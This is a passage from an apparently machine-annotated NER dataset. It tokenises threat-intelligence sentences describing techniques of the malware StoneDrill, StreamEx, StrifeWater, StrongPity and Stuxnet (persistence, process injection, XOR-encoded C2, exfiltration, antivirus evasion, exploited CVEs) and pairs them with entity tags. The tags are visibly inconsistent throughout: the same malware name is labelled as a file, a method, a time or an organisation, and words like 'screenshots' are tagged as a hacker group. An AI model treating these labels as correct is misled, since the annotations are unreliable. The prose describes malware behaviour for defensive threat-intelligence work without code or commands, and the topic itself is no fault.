"B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "been", - "observed", - "deleting", - "the", - "temporary", - "files", - "once", - "they", - "fulfill", - "their", - "task." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "downloaded", - "and", - "dropped", - "temporary", - "files", - "containing", - "scripts;", - "it", - "additionally", - "has", - "a", - "function", - "to", - "upload", - "files", - "from", - "the", - "victims", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "relied", - "on", - "injecting", - "its", - "payload", - "directly", - "into", - "the", - "process", - "memory", - "of", - "the", - "victim's", - "preferred", - "browser." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "looked", - "in", - "the", - "registry", - "to", - "find", - "the", - "default", - "browser", - "path." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "can", - "take", - "screenshots." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "StoneDrill", - "can", - "check", - "for", - "antivirus", - "and", - "antimalware", - "programs." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "the", - "capability", - "to", - "discover", - "the", - "system", - "OS,", - "Windows", - "version,", - "architecture", - "and", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "can", - "obtain", - "the", - "current", - "date", - "and", - "time", - "of", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "used", - "several", - "anti-emulation", - "techniques", - "to", - "prevent", - "automated", - "analysis", - "by", - "emulators", - "or", - "sandboxes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "several", - "VBS", - "scripts", - "used", - "throughout", - "the", - "malware's", - "lifecycle." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StoneDrill", - "has", - "used", - "the", - "WMI", - "command-line", - "(WMIC)", - "utility", - "to", - "run", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StreamEx", - "has", - "the", - "ability", - "to", - "enumerate", - "drive", - "types." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "StreamEx", - "has", - "the", - "ability", - "to", - "modify", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "StreamEx", - "obfuscates", - "some", - "commands", - "by", - "using", - "statically", - "programmed", - "fragments", - "of", - "strings", - "when", - "starting", - "a", - "DLL.", - "It", - "also", - "uses", - "a", - "one-byte", - "xor", - "against", - "0x91", - "to", - "encode", - "configuration", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StreamEx", - "has", - "the", - "ability", - "to", - "enumerate", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "StreamEx", - "uses", - "rundll32", - "to", - "call", - "an", - "exported", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StreamEx", - "has", - "the", - "ability", - "to", - "scan", - "for", - "security", - "tools", - "such", - "as", - "firewalls", - "and", - "antivirus", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "StreamEx", - "has", - "the", - "ability", - "to", - "enumerate", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "StreamEx", - "has", - "the", - "ability", - "to", - "remotely", - "execute", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "StreamEx", - "establishes", - "persistence", - "by", - "installing", - "a", - "new", - "service", - "pointing", - "to", - "its", - "DLL", - "and", - "setting", - "the", - "service", - "to", - "auto-start." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "send", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "self", - "delete", - "to", - "cover", - "its", - "tracks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "enumerate", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "download", - "updates", - "and", - "auxiliary", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "has", - "been", - "named", - "`calc.exe`", - "to", - "appear", - "as", - "a", - "legitimate", - "calculator", - "program." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "use", - "a", - "variety", - "of", - "APIs", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "has", - "create", - "a", - "scheduled", - "task", - "named", - "`Mozilla\\Firefox", - "Default", - "Browser", - "Agent", - "409046Z0FF4A39CB`", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "has", - "the", - "ability", - "to", - "take", - "screen", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "encrypt", - "C2", - "traffic", - "using", - "XOR", - "with", - "a", - "hard", - "coded", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "collect", - "the", - "OS", - "version,", - "architecture,", - "and", - "machine", - "name", - "to", - "create", - "a", - "unique", - "token", - "for", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "collect", - "the", - "user", - "name", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "collect", - "the", - "time", - "zone", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "modify", - "its", - "sleep", - "time", - "responses", - "from", - "the", - "default", - "of", - "20-22", - "seconds." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrifeWater", - "can", - "execute", - "shell", - "commands", - "using", - "`cmd.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "compress", - "and", - "encrypt", - "archived", - "files", - "into", - "multiple", - ".sft", - "files", - "with", - "a", - "repeated", - "xor", - "encryption", - "scheme." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "encrypted", - "C2", - "traffic", - "using", - "SSL/TLS." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "a", - "file", - "searcher", - "component", - "that", - "can", - "automatically", - "collect", - "and", - "archive", - "files", - "based", - "on", - "a", - "predefined", - "list", - "of", - "file", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "automatically", - "exfiltrate", - "collected", - "documents", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "been", - "signed", - "with", - "self-signed", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "add", - "directories", - "used", - "by", - "the", - "malware", - "to", - "the", - "Windows", - "Defender", - "exclusions", - "list", - "to", - "prevent", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "used", - "encrypted", - "strings", - "in", - "its", - "dropper", - "component." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "exfiltrate", - "collected", - "documents", - "through", - "C2", - "channels." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "delete", - "previously", - "exfiltrated", - "files", - "from", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "parse", - "the", - "hard", - "drive", - "on", - "a", - "compromised", - "host", - "to", - "identify", - "specific", - "file", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "the", - "ability", - "to", - "hide", - "the", - "console", - "window", - "for", - "its", - "document", - "search", - "module", - "from", - "the", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "download", - "files", - "to", - "specified", - "targets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "been", - "executed", - "via", - "compromised", - "installation", - "files", - "for", - "legitimate", - "software", - "including", - "compression", - "applications,", - "security", - "software,", - "browsers,", - "file", - "recovery", - "applications,", - "and", - "other", - "tools", - "and", - "utilities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "named", - "services", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "been", - "bundled", - "with", - "legitimate", - "software", - "installation", - "files", - "for", - "disguise." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "use", - "multiple", - "layers", - "of", - "proxy", - "servers", - "to", - "hide", - "terminal", - "nodes", - "in", - "its", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "used", - "HTTPS", - "over", - "port", - "1402", - "in", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "use", - "PowerShell", - "to", - "add", - "files", - "to", - "the", - "Windows", - "Defender", - "exclusions", - "list." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "determine", - "if", - "a", - "user", - "is", - "logged", - "in", - "by", - "checking", - "to", - "see", - "if", - "explorer.exe", - "is", - "running." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "use", - "the", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "Registry", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "identify", - "if", - "ESET", - "or", - "BitDefender", - "antivirus", - "are", - "installed", - "before", - "dropping", - "its", - "payload." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "install", - "a", - "service", - "to", - "execute", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "identify", - "the", - "hard", - "disk", - "volume", - "serial", - "number", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "identify", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StrongPity", - "has", - "created", - "new", - "services", - "and", - "modified", - "existing", - "services", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "encrypts", - "exfiltrated", - "data", - "via", - "C2", - "with", - "static", - "31-byte", - "long", - "XOR", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "used", - "a", - "digitally", - "signed", - "driver", - "with", - "a", - "compromised", - "Realtek", - "certificate." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "infected", - "WinCC", - "machines", - "via", - "a", - "hardcoded", - "database", - "server", - "password." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "decrypts", - "resources", - "that", - "are", - "loaded", - "into", - "memory", - "and", - "executed." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "enumerates", - "user", - "accounts", - "of", - "the", - "domain." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "attempts", - "to", - "access", - "network", - "resources", - "with", - "a", - "domain", - "account’s", - "credentials." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "injects", - "an", - "entire", - "DLL", - "into", - "an", - "existing,", - "newly", - "created,", - "or", - "preselected", - "trusted", - "process." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "encrypted", - "configuration", - "blocks", - "and", - "writes", - "encrypted", - "files", - "to", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "checks", - "for", - "specific", - "operating", - "systems", - "on", - "32-bit", - "machines,", - "Registry", - "keys,", - "and", - "dates", - "for", - "vulnerabilities,", - "and", - "will", - "exit", - "execution", - "if", - "the", - "values", - "are", - "not", - "met." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "sends", - "compromised", - "victim", - "information", - "via", - "HTTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Stuxnet", - "used", - "MS10-073", - "and", - "an", - "undisclosed", - "Task", - "Scheduler", - "vulnerability", - "to", - "escalate", - "privileges", - "on", - "local", - "Windows", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "propagates", - "using", - "the", - "MS10-061", - "Print", - "Spooler", - "and", - "MS08-067", - "Windows", - "Server", - "Service", - "vulnerabilities." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "I-Way", - "B-SecTeam", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "has", - "the", - "ability", - "to", - "generate", - "new", - "C2", - "domains." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "an", - "RPC", - "server", - "that", - "contains", - "a", - "routine", - "for", - "file", - "deletion", - "and", - "also", - "removes", - "itself", - "from", - "the", - "system", - "through", - "a", - "DLL", - "export", - "by", - "deleting", - "specific", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "a", - "driver", - "to", - "scan", - "for", - "specific", - "filesystem", - "driver", - "objects." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "reduces", - "the", - "integrity", - "level", - "of", - "objects", - "to", - "allow", - "write", - "actions." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "can", - "delete", - "OLE", - "Automation", - "and", - "SQL", - "stored", - "procedures", - "used", - "to", - "store", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "installs", - "an", - "RPC", - "server", - "for", - "P2P", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "an", - "RPC", - "server", - "that", - "contains", - "a", - "file", - "dropping", - "routine", - "and", - "support", - "for", - "payload", - "version", - "updates", - "for", - "P2P", - "communications", - "within", - "a", - "victim", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "enumerates", - "user", - "accounts", - "of", - "the", - "local", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "can", - "create", - "registry", - "keys", - "to", - "load", - "driver", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "the", - "SetSecurityDescriptorDacl", - "API", - "to", - "reduce", - "object", - "integrity", - "levels." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "enumerates", - "the", - "directories", - "of", - "a", - "network", - "resource." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "enumerates", - "removable", - "drives", - "for", - "infection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "searches", - "the", - "Registry", - "for", - "indicators", - "of", - "security", - "programs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "can", - "propagate", - "via", - "peer-to-peer", - "communication", - "and", - "updates", - "using", - "RPC." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Stuxnet", - "can", - "propagate", - "via", - "removable", - "media", - "using", - "an", - "autorun.inf", - "file", - "or", - "the", - "CVE-2010-2568", - "LNK", - "vulnerability." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "a", - "Windows", - "rootkit", - "to", - "mask", - "its", - "binaries", - "and", - "other", - "relevant", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "propagates", - "to", - "available", - "network", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "used", - "xp_cmdshell", - "to", - "store", - "and", - "execute", - "SQL", - "code." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "schedules", - "a", - "network", - "job", - "to", - "execute", - "two", - "minutes", - "after", - "host", - "infection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "enumerates", - "the", - "currently", - "running", - "processes", - "related", - "to", - "a", - "variety", - "of", - "security", - "products." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "calls", - "LoadLibrary", - "then", - "executes", - "exports", - "from", - "a", - "DLL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "transforms", - "encrypted", - "binary", - "data", - "into", - "an", - "ASCII", - "string", - "in", - "order", - "to", - "use", - "it", - "as", - "a", - "URL", - "parameter", - "value." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "encodes", - "the", - "payload", - "of", - "system", - "information", - "sent", - "to", - "the", - "command", - "and", - "control", - "servers", - "using", - "a", - "one", - "byte", - "0xFF", - "XOR", - "key.", - "Stuxnet", - "also", - "uses", - "a", - "31-byte", - "long", - "static", - "byte", - "string", - "to", - "XOR", - "data", - "sent", - "to", - "command", - "and", - "control", - "servers.", - "The", - "servers", - "use", - "a", - "different", - "static", - "key", - "to", - "encrypt", - "replies", - "to", - "the", - "implant." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "collects", - "system", - "information", - "including", - "computer", - "and", - "domain", - "names,", - "OS", - "version,", - "and", - "S7P", - "paths." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "collects", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "collects", - "the", - "time", - "and", - "date", - "of", - "a", - "system", - "when", - "it", - "is", - "infected." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - 